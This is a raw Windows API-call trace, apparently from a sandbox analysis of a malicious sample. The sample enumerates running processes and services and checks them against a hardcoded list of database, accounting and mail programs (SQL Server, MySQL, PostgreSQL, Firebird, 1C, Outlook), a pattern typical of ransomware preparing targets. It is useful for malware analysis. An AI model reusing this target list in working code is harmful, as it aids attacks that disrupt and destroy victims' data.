lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0269.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0269.559] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0269.560] lstrlenW (lpString="winlogon.exe") returned 12 [0269.560] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0269.560] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0269.560] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0269.560] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0269.560] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0269.560] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0269.560] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0269.560] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0269.560] lstrlenW (lpString="services.exe") returned 12 [0269.560] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0269.560] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0269.560] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0269.560] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0269.560] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0269.560] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0269.560] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0269.560] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0269.561] lstrlenW (lpString="lsass.exe") returned 9 [0269.561] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0269.561] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0269.561] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0269.561] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0269.561] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0269.561] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0269.561] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0269.561] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0269.561] lstrlenW (lpString="lsm.exe") returned 7 [0269.561] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0269.561] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0269.561] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0269.561] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0269.561] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0269.561] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0269.561] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0269.561] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.562] lstrlenW (lpString="svchost.exe") returned 11 [0269.562] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.562] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.562] lstrlenW (lpString="svchost.exe") returned 11 [0269.562] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.562] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.562] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.563] lstrlenW (lpString="svchost.exe") returned 11 [0269.563] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.563] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.563] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.563] lstrlenW (lpString="svchost.exe") returned 11 [0269.563] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.563] lstrlenW (lpString="svchost.exe") returned 11 [0269.563] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0269.564] lstrlenW (lpString="audiodg.exe") returned 11 [0269.564] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.564] lstrlenW (lpString="svchost.exe") returned 11 [0269.564] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.564] lstrlenW (lpString="svchost.exe") returned 11 [0269.564] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0269.565] lstrlenW (lpString="userinit.exe") returned 12 [0269.565] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0269.565] lstrlenW (lpString="dwm.exe") returned 7 [0269.565] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0269.565] lstrlenW (lpString="explorer.exe") returned 12 [0269.565] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0269.565] lstrlenW (lpString="spoolsv.exe") returned 11 [0269.565] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0269.566] lstrlenW (lpString="taskhost.exe") returned 12 [0269.566] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.566] lstrlenW (lpString="svchost.exe") returned 11 [0269.566] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0269.566] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0269.566] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0269.567] lstrlenW (lpString="reader_sl.exe") returned 13 [0269.567] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0269.567] CloseHandle (hObject=0x388) returned 1 [0269.567] Sleep (dwMilliseconds=0x1f4) [0270.186] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0270.340] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0270.774] GetLastError () returned 0xea [0270.774] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe3c) returned 0x3dec5a0 [0270.774] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xe3c, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0270.938] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0270.939] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0270.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0270.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0270.939] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0270.939] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0270.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0270.939] lstrlenW (lpString="AudioSrv") returned 8 [0270.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0270.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0270.939] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0270.939] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0270.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0270.939] lstrlenW (lpString="BFE") returned 3 [0270.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0270.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0270.939] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0270.939] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0270.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0270.939] lstrlenW (lpString="CryptSvc") returned 8 [0270.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0270.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0270.939] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0270.939] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0270.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0270.939] lstrlenW (lpString="CscService") returned 10 [0270.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0270.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0270.939] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0270.939] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0270.939] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0270.939] lstrlenW (lpString="DcomLaunch") returned 10 [0270.939] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.939] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.940] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0270.940] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0270.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0270.940] lstrlenW (lpString="Dhcp") returned 4 [0270.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0270.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0270.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0270.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0270.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0270.940] lstrlenW (lpString="Dnscache") returned 8 [0270.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0270.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0270.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0270.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0270.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0270.940] lstrlenW (lpString="DPS") returned 3 [0270.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0270.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0270.940] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0270.940] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0270.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0270.940] lstrlenW (lpString="eventlog") returned 8 [0270.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0270.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0270.940] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0270.940] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0270.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0270.940] lstrlenW (lpString="EventSystem") returned 11 [0270.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0270.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0270.940] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0270.940] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0270.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0270.940] lstrlenW (lpString="gpsvc") returned 5 [0270.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0270.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0270.941] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0270.941] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0270.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0270.941] lstrlenW (lpString="iphlpsvc") returned 8 [0270.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0270.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0270.941] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0270.941] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0270.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0270.941] lstrlenW (lpString="LanmanWorkstation") returned 17 [0270.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0270.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0270.941] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0270.941] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0270.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0270.941] lstrlenW (lpString="lmhosts") returned 7 [0270.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0270.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0270.941] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0270.941] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0270.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0270.941] lstrlenW (lpString="MMCSS") returned 5 [0270.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0270.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0270.942] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0270.942] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0270.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0270.942] lstrlenW (lpString="MpsSvc") returned 6 [0270.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0270.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0270.942] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0270.942] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0270.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0270.942] lstrlenW (lpString="NlaSvc") returned 6 [0270.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0270.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0270.942] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0270.942] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0270.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0270.942] lstrlenW (lpString="nsi") returned 3 [0270.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0270.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0270.942] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0270.942] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0270.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0270.942] lstrlenW (lpString="PcaSvc") returned 6 [0270.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0270.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0270.942] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0270.942] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0270.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0270.942] lstrlenW (lpString="PlugPlay") returned 8 [0270.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0270.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0270.942] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0270.942] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0270.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0270.943] lstrlenW (lpString="Power") returned 5 [0270.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0270.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0270.943] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0270.943] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0270.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0270.943] lstrlenW (lpString="ProfSvc") returned 7 [0270.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0270.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0270.943] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0270.943] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0270.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0270.943] lstrlenW (lpString="RpcEptMapper") returned 12 [0270.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.943] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0270.943] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0270.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0270.943] lstrlenW (lpString="RpcSs") returned 5 [0270.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0270.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0270.943] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0270.943] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0270.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0270.943] lstrlenW (lpString="SamSs") returned 5 [0270.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0270.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0270.943] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0270.943] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0270.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0270.943] lstrlenW (lpString="Schedule") returned 8 [0270.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0270.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0270.943] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0270.944] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0270.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0270.944] lstrlenW (lpString="SENS") returned 4 [0270.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0270.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0270.944] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0270.944] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0270.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0270.944] lstrlenW (lpString="ShellHWDetection") returned 16 [0270.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.944] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0270.944] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned 